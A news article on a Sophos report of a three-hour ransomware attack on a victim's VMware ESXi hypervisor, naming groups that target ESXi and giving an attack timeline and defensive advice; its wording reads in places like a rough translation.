BlackMatter, HelloKitty, and REvil among groups targeting VMware’s ESXi hypervisor
Mathew J. Schwartz (euroinfosec) •
October 5, 2021
How fast can ransomware attackers strike? In one case, it took one or more ransomware attackers three hours to gain initial access to a target, escalate their attack, and deploy crypto-lockdown malware.
That’s what security firm Sophos says, in a new report detailing a ransomware outbreak that hit the victim’s installation of VMware ESXi, which is an enterprise-class hypervisor designed to partition servers into multiple virtual machines. .
“This is one of the fastest ransomware attacks Sophos has ever investigated and it appears to target the ESXi platform with precision,” says Andrew Brandt, senior researcher at Sophos.
The attack is notable not only for its speed, but also for a list of defensive mistakes made by the victim – which might otherwise have repelled the attack – including leaving unnecessary features active and not using multi-factor authentication to Lock down remote access tools, especially for users with administrator-level access to back-end systems.
Hitting a hypervisor gives attackers the ability to forcibly encrypt many different systems at once. If the hypervisor is to host a multi-tenant environment, furthermore, attackers might have the ability to crypto-lock down systems used by multiple organizations, thus giving them more victims to extort.
“ESXi servers represent an attractive target for ransomware threat actors because they can attack multiple virtual machines at a time, where each of the virtual machines could run business critical applications or services,” says Brandt. “Attacks on hypervisors can be both rapid and very disruptive. Ransomware operators, including DarkSide and REvil, have targeted ESXi servers in attacks.
ESXi targeting groups
Sophos did not attribute the attack it investigated to any particular ransomware group.
But as he notes, several groups have been seen targeting ESXi. They include REvil, also known as Sodinokibi, which was the dominant strain of ransomware seen in the second trimester, before subsiding over the summer. But the ransomware group has recently resumed operations.
After also disappearing over the summer, DarkSide appears to have been reborn as BlackMatter. In August, the MalwareHunterTeam security research group, warned that BlackMatter continues to use a Linux version of DarkSide malware developed to target ESXi environments, which includes the ability to run ESXi shell commands, and therefore force shutdown machines virtual so that they can be encrypted and kept for a ransom.
In July, meanwhile, Doel Santos and Ruchna Nigam from Palo Alto Unit 42 Threat Research Group warned that they had spotted “a Linux variant of HelloKitty targeting VMware’s ESXi hypervisor, which is widely used in cloud and on-premises data centers” (see: 7 new ransomware groups practicing double extortion).
Attackers use Python
In his report, Sophos says this incident involved attackers who successfully sneak a Python script on a server running ESXi, where Python is installed by default.
What is unclear is how many other organizations attackers attempted to target before successfully reaching this one.
Sophos did not immediately respond to a request for additional information about the victim, such as the industry and geography in which they operate.
But many aspects of attackers’ MO aren’t new, including hitting the victim on a weekend, when IT teams would be less likely to spot or be able to stop the intrusion quickly. .
Luckily for attackers, Sophos says they appear to have found an active shell to access ESXi, which administrators use for routine maintenance, including updates, but typically would have disabled afterwards, for security reasons.
Early Sunday morning strike
Here is a timeline of the attack as detailed by Sophos, at the victim’s local time, early on a Sunday morning:
- 12:30 am: Attackers gain access to TeamViewer remote access and control software running on a computer assigned to a user who also has Active Directory domain administrator access credentials. The TeamViewer software was not protected by multi-factor authentication, which means that the attackers probably broke in with brute force.
- 00:40: Attackers use the free Advanced IP Scanner tool to identify an ESXi server, then discover that administrators have left an active shell. Attackers use the shell to connect remotely, via a remote access tool called Bitvise. The attackers then download a Python script.
- 03:40 am: The attackers run the Python script, which creates a directory map and inventories each hypervisor, then stops them all and encrypts each virtual drive hosted on the ESXi server, leaving a ransom note.
The point to remember for any organization running a hypervisor is that attackers have a habit of attempting to exploit them, which means they have to pursue the proper defenses.
“This includes the use of unique, hard-to-force passwords and the application of multi-factor authentication where possible,” says Brandt, and in particular for remote access accounts, including the protocol. remote desktop and TeamViewer.
To help organizations using ESXi, VMware has released a hypervisor security guide.
Beyond minimizing access, especially for administrators – including regularly auditing Active Directory access levels – Sophos also recommends using VLANs, or VLANs, to segment critical servers , including ESXi platforms, to make them harder to attack.
“The ESXi shell can and should be disabled whenever it is not in use by personnel for routine maintenance, for example, when installing patches,” says Brandt. “The IT team can do this either by using commands on the server console or through the software management tools provided by the vendor. “